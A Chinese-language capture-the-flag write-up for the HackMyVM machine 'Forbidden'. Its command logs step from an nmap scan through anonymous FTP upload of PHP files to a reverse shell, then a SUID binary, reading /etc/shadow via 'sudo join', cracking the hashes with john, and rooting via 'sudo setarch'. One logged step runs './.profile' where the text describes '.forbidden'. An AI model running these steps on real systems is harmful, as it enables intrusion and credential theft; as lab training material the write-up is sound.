hack-my-vm:Forbidden

SunRT

2025-02-20

HACK-MY-VM

Forbidden

端口扫描

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.1.32                                                                                   [3:15:23]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-20 03:15 CST
Nmap scan report for 192.168.1.32
Host is up (0.00069s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
8000/tcp open  http-alt
MAC Address: 08:00:27:CF:0C:89 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.78 seconds

kali@kali [~] ➜  sudo nmap -sT -sV -sC -p21,80 -O 192.168.1.32                                                                                    [2:46:05]
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-20 03:15 CST
Nmap scan report for 192.168.1.32
Host is up (0.00062s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0            4096 Feb 19 13:18 www [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.5
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:CF:0C:89 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (99%), Linux 5.0 - 5.5 (99%), Linux 5.0 - 5.4 (97%), Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 2.6.32 (96%), Linux 5.4 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.56 seconds

80端口渗透

kali@kali [~] ➜  curl http://192.168.1.32                                                                                                         [3:15:40]
<h1>SECURE WEB/FTP<h1>

Hi, Im the best admin of the world.
You cannot execute .php code on this server so you cannot
obtain a reverse shell. Not sure if its misconfigured another things... but
the importart is that php is disabled.

-marta

告诉我们.php文件可能无法解析，让我们不要上传

kali@kali [~] ➜  sudo dirsearch -u http://192.168.1.32                                                                                            [3:16:54]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.1.32/_25-02-20_03-17-45.txt

Target: http://192.168.1.32/

[03:17:45] Starting: 
[03:18:29] 200 -   10B  - /robots.txt

Task Completed

robots.txt看了看没啥发现

ftp渗透

kali@kali [~] ➜  ftp 192.168.1.32                                                                                                                 [3:18:43]
Connected to 192.168.1.32.
220 (vsFTPd 3.0.3)
Name (192.168.1.32:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd www
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||44235|)
150 Here comes the directory listing.
-rwxrwxrwx    1 0        0             241 Oct 09  2020 index.html
-rwxrwxrwx    1 0        0              75 Oct 09  2020 note.txt
-rwxrwxrwx    1 0        0              10 Oct 09  2020 robots.txt

ftp是匿名登录，还有个note.txt，访问一下看一看

1 2	kali@kali [~] ➜ curl http://192.168.1.32/note.txt [3:15:19] The extra-secured .jpg file contains my password but nobody can obtain it.

说有密码在图片里，但是问题是没22端口，要密码没用啊，先搁置，只能尝试上传反弹shell了，相信靶机并没有完全的过滤

ftp> ls
229 Entering Extended Passive Mode (|||44235|)
150 Here comes the directory listing.
-rw-r--r--    1 105      113           109 Feb 19 13:18 1.php3
-rw-r--r--    1 105      113           109 Feb 19 13:18 1.php5
-rw-r--r--    1 105      113           109 Feb 19 13:18 1.phtml
-rwxrwxrwx    1 0        0             241 Oct 09  2020 index.html
-rwxrwxrwx    1 0        0              75 Oct 09  2020 note.txt

//上传一些可能会解析的php文件，尝试访问

最终发现php5可以解析，成功反弹shell

kali@kali [~] ➜  nc -lvnp 8888                                                                                                                    [3:25:00]
listening on [any] 8888 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.32] 38482
bash: cannot set terminal process group (330): Inappropriate ioctl for device
bash: no job control in this shell
www-data@forbidden:/srv/ftp/www$

提权

www-data@forbidden:/home/marta$ ls -la
ls -la
total 52
drwxr-xr-x 3 marta marta  4096 Oct  9  2020 .
drwxr-xr-x 5 root  root   4096 Oct  9  2020 ..
-rw------- 1 marta marta    55 Oct  9  2020 .Xauthority
-rw-r--r-- 1 marta marta   220 Oct  9  2020 .bash_logout
-rw-r--r-- 1 marta marta  3526 Oct  9  2020 .bashrc
-rwsr-sr-x 1 root  marta 16712 Oct  9  2020 .forbidden
drwxr-xr-x 3 marta marta  4096 Oct  9  2020 .local
-rw-r--r-- 1 marta marta   807 Oct  9  2020 .profile
-rw-r--r-- 1 root  root    130 Oct  9  2020 hidden.c
www-data@forbidden:/home/marta$ cat hidden.c
cat hidden.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setuid(1001); setgid(1001); system("/bin/bash");
}

发现一个提权的c程序，而且.forbidden有s权限，猜测这个就是编译好的程序，就不用先分析了，直接执行

www-data@forbidden:/home/marta$ ./.profile
$ python -c 'import pty; pty.spawn("/bin/bash")'
markos@forbidden:/home/marta$ whoami
whoami
markos
markos@forbidden:/home/marta$

提权至markos权限，全局搜索前面的图片有密码的提示

markos@forbidden:/home/marta$ find / -name "*.jpg" 2>/dev/null
find / -name "*.jpg" 2>/dev/null
/var/www/html/TOPSECRETIMAGE.jpg
markos@forbidden:/home/marta$

传回本机分析

kali@kali [~] ➜  exiftool TOPSECRETIMAGE.jpg                                                                                                      [3:34:18]
ExifTool Version Number         : 12.76
File Name                       : TOPSECRETIMAGE.jpg
Directory                       : .
File Size                       : 33 kB
File Modification Date/Time     : 2020:10:10 01:04:22+08:00
File Access Date/Time           : 2025:02:20 02:31:41+08:00
File Inode Change Date/Time     : 2025:02:20 02:31:31+08:00
File Permissions                : -rw-rw-r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Image Width                     : 324
Image Height                    : 216
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 324x216
Megapixels                      : 0.070
kali@kali [~] ➜  binwalk TOPSECRETIMAGE.jpg                                                                                                       [3:34:19]

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01

没有所谓的密码，只能尝试该图片的名字了

markos@forbidden:/home$ su - marta
su - marta
Password: TOPSECRETIMAGE

marta@forbidden:~$ whoami
whoami
marta
marta@forbidden:~$

提权成功，手动枚举

marta@forbidden:~$ sudo -l
sudo -l
Matching Defaults entries for marta on forbidden:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User marta may run the following commands on forbidden:
    (ALL : ALL) NOPASSWD: /usr/bin/join
marta@forbidden:~$ sudo /usr/bin/join -a 2 /dev/null /etc/shadow 
sudo /usr/bin/join -a 2 /dev/null /etc/shadow
root:$6$8nU2FdqnxRtT9mWF$9q7El.D7BDrlzNyYYPNqjTcwsQEsC7utrzszLgbe9V.3KqYSfx2XgqjIEeToP41TJTiZQOGVsdCzIAYHw5O.51:18544:0:99999:7:::
daemon:*:18544:0:99999:7:::
bin:*:18544:0:99999:7:::
sys:*:18544:0:99999:7:::
sync:*:18544:0:99999:7:::
games:*:18544:0:99999:7:::
man:*:18544:0:99999:7:::
lp:*:18544:0:99999:7:::
mail:*:18544:0:99999:7:::
news:*:18544:0:99999:7:::
uucp:*:18544:0:99999:7:::
proxy:*:18544:0:99999:7:::
www-data:*:18544:0:99999:7:::
backup:*:18544:0:99999:7:::
list:*:18544:0:99999:7:::
irc:*:18544:0:99999:7:::
gnats:*:18544:0:99999:7:::
nobody:*:18544:0:99999:7:::
_apt:*:18544:0:99999:7:::
systemd-timesync:*:18544:0:99999:7:::
systemd-network:*:18544:0:99999:7:::
systemd-resolve:*:18544:0:99999:7:::
messagebus:*:18544:0:99999:7:::
marta:$6$h.4ZF5esZ/N1OIcu$8vL1D3iM6iuhniSG8nIz0582atbIV6y/UBl0eks1.Wrd51BqLK8Wqt91WXg0Y2mrdNY4luPQkqUWXFXWxLVwe/:18544:0:99999:7:::
systemd-coredump:!!:18544::::::
ftp:*:18544:0:99999:7:::
sshd:*:18544:0:99999:7:::
markos:$6$PTerrFpyfOmkM5Xi$oo8gNZyyxsZbKhOIXrm2w/x.Xvhdr7Ny/4JgLDRLRAxAwEwGtH2kD7PjzeloAstqCPq/KKrqrPioMM8vwWbqZ.:18544:0:99999:7:::
peter:$6$QAeWH9Et9PAJdYz/$/4VhburW9KoVTRY1Ry63wNEfr4rxwQGaRJ3kKW2nEAk0LcqjqZjy/m5rtaCi3VebNu7AaGFhQT4FBgbQVIyq81:18544:0:99999:7:::
marta@forbidden:~$

发现并使用join读取敏感文件，将剩余的两个账号密码传回本机进行破解

kali@kali [~] ➜  cat x                                                                                                                       
peter:$6$QAeWH9Et9PAJdYz/$/4VhburW9KoVTRY1Ry63wNEfr4rxwQGaRJ3kKW2nEAk0LcqjqZjy/m5rtaCi3VebNu7AaGFhQT4FBgbQVIyq81:18544:0:99999:7:::
root:$6$8nU2FdqnxRtT9mWF$9q7El.D7BDrlzNyYYPNqjTcwsQEsC7utrzszLgbe9V.3KqYSfx2XgqjIEeToP41TJTiZQOGVsdCzIAYHw5O.51:18544:0:99999:7:::
kali@kali [~] ➜  john x                                                                                                                     
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
boomer           (peter)     
Proceeding with incremental:ASCII
1g 0:00:36:38  3/3 0.000454g/s 4190p/s 4190c/s 4190C/s bunkyood..bunkryne
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

切换用户，并再次尝试手动枚举

peter@forbidden:~$ whoami
whoami
peter
peter@forbidden:~$ sudo -l
sudo -l
Matching Defaults entries for peter on forbidden:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on forbidden:
    (ALL : ALL) NOPASSWD: /usr/bin/setarch
peter@forbidden:~$ uname -m
uname -m
x86_64
peter@forbidden:~$

查阅文档，利用setarch提权

peter@forbidden:~$ sudo setarch x86_64 /bin/bash
sudo setarch x86_64 /bin/bash
root@forbidden:/home/peter# whoami
whoami
root

完成